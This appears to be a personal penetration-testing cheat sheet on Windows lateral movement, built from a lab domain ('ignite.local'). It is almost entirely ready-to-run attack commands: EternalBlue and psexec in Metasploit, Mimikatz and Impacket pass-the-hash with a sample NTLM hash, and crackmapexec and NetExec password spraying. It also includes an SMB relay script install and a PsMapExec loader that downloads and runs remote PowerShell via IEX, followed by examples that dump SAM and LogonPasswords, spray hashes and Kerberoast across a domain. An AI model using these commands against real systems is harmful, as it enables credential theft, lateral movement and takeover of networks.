MSF

use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/psexec
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38

MiMi

privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

Impacket

#SMB
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

#WMI
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
#win
wget <https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1>; Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\\hacked" -Verbose
wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]

#RPC
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
pth-net rpc share list -U 'ignite\\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105

#Other
pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 cmd.exe
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 <http://192.168.1.105/file.txt>
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected] whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected] query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s

SMB Relay Attack Script

git clone <https://github.com/m4lal0/smbrelay>
cd smbrelay; chmod +x smbrelay.sh
./smbrelay.sh --install

Untitled

MUT

❌ CrackMapExec - closed

✅ NetExec (Linux/MacOS)

Untitled

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

//Start
- NetExec
- nxc
- nxcdb
- netexec

#DB
nxcdb help
workspace list
workspace HTB
proto smb

#Usage
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success | grep '[+]'

#Passwords Policy
crackmapexec smb targets.txt -u User -p P@ssw0rd --pass-pol
crackmapexec smb targets.txt -u User -p P@ssw0rd --local-groups
crackmapexec smb targets.txt -u User -p P@ssw0rd --groups
crackmapexec smb targets.txt -u User -p P@ssw0rd --users

 PsMapExec (Windows)

Untitled

https://private-user-images.githubusercontent.com/68926315/279332478-14770c85-b751-4127-8261-2e49ff25a8ad.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIwNzg5ODIsIm5iZiI6MTcyMjA3ODY4MiwicGF0aCI6Ii82ODkyNjMxNS8yNzkzMzI0NzgtMTQ3NzBjODUtYjc1MS00MTI3LTgyNjEtMmU0OWZmMjVhOGFkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzI3VDExMTEyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI1ZTU5NjkzZWM3ODVkNGE4M2U0OGY1NzVlNjhhZjIzNTk3YTMxNDBkYmFlZTY1ZmZlMGZhZDEzMjYzODZmYTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.n_aRBHkfLH-QUWQtOxJL1bcHAH1HCxMGw71bf1vjeUo

https://private-user-images.githubusercontent.com/68926315/279332478-14770c85-b751-4127-8261-2e49ff25a8ad.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIwNzg5ODIsIm5iZiI6MTcyMjA3ODY4MiwicGF0aCI6Ii82ODkyNjMxNS8yNzkzMzI0NzgtMTQ3NzBjODUtYjc1MS00MTI3LTgyNjEtMmU0OWZmMjVhOGFkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzI3VDExMTEyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI1ZTU5NjkzZWM3ODVkNGE4M2U0OGY1NzVlNjhhZjIzNTk3YTMxNDBkYmFlZTY1ZmZlMGZhZDEzMjYzODZmYTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.n_aRBHkfLH-QUWQtOxJL1bcHAH1HCxMGw71bf1vjeUo

IEX(New-Object System.Net.WebClient).DownloadString("<https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1>")

//Start
# Execute WMI commands over all systems in the domain using password authentication
 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command whoami

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command whoami

# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
 
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\\temp\\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain that have AdminCount=1
PsMapExec -Targets "AdminCount=1" -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# IPMI
PsMapExec -Targets 192.168.1.0/24 -Method IPMI